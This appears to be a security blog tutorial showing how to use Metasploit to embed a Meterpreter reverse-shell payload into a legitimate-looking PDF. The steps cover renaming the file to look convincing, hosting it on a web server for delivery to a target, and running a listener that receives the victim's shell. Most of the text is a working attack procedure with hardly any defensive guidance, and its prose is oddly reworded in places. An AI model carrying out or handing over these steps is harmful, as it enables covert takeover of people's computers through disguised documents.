White Hat Institute

Embedding backdoor into PDF files

PDF, or Portable Document Format, is an extraordinarily intricate file format, represented by numerous models and semi-principles. Like HTML and CSS, it was intended for document layout and introduction. Additionally, like HTML and CSS, it has been expanded with a JavaScript motor and document API that enables developers to transform PDF reports into applications — or agents for malware.

Among the most generally utilized Adobe items is Reader. Almost every PC has some variant of Adobe Reader on it for perusing PDFs. You presumably have it, as well. However, most people are ignorant of the security issues that Reader has encountered — and they neglect to upgrade or fix it.

In this article, we will show you how to compromise a target machine with a malicious PDF file.

First, start the msfconsole and search for the “adobe_pdf” exploit. Metasploit will present you with numerous exploits designed for various operating systems. The one that we are going to use is “exploit/windows/fileformat/adobe_pdf_embedded_exe” designed for Windows systems.

Ex: (msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe).

backdoor pdf 1

Now we should view the data accessible to us about this exploit, to do so, type the “show options” command.

backdoor pdf 2

It will show you the default information regarding the PDF name and the location of the default basic PDF file. We need to change it and create our malicious PDF file. Before starting this tutorial, we downloaded a “cybersecurity-101.pdf” file from the website, so we are going to embed a backdoor into this file. For this, we need to set “INFILENAME” option and provide a direct path to the “cybersecurity-101.pdf” file. 

Next, we should change the name of the newly created malicious PDF file to something more convincing by setting the “FILENAME’ option. Lastly, you may create your own alert messages that can be displayed on the target computer once the malicious PDF file is run (this part is optional). To accomplish it, you need to set the “LAUNCH_MESSAGE” option and provide any warning or alert message you want.

backdoor pdf 3
backdoor pdf 4

Once the basic setup is complete next, we need to find a payload to embed it into the PDF file. Type the “show payloads” command to list all available payloads and pick the one of your interest. In this example, we will use the “windows/meterpreter/reverse_tcp” payload.

backdoor pdf 5

Set the “PAYLOAD” option to “windows/meterpreter/reverse_tcp” and hit “Enter.” Type the “show options” command to list all available options that can be set further.

backdoor pdf 6

Set the “LHOST” option to an attacker’s IP and then type “exploit” to create a malicious PDF file. You may also change the default port number to whatever you like, but in this case, we will keep it as is.

backdoor pdf 7

When the generating process is completed successfully, your backdoored PDF file will be stored at the “/root/.msf4/local/Cybersecurity.pdf” location. Now, let’s move this file to our web server so we can deliver it to our target machine efficiently.

Ex: ([email protected]:~# mv /root/.msf4/local/Cybersecurity.pdf /var/www/html/Evil-Files/).

Before running our malicious PDF file on the target computer, we need to start the listener to listen for an incoming connection. For this, we are going to use “exploit/multi/handler” with “windows/meterpreter/reverse_tcp” payload.

backdoor pdf 8

Set the “LHOST” option to an attacker’s IP and set “LPORT” to a port number you used during the creation of the malicious PDF file. In this example, we kept the default port, so we will not change it and keep it as is. Then type “exploit” to start listening.

backdoor pdf 9

Once the PDF file is executed in the target computer, it‘ll display legitimate PDF file contents, but in the background, our malicious backdoor will run and send a reverse shell connection to an attacker’s computer.

backdoor pdf 10

Adobe has had various security issues with its items, including Adobe Reader, Illustrator, Flash, and others. Security vulnerabilities are halfway in charge of Apple restricting Flash from their iOS. Adobe keeps on being sub-par in security, and subsequently, a considerable number of customer operating systems are vulnerable.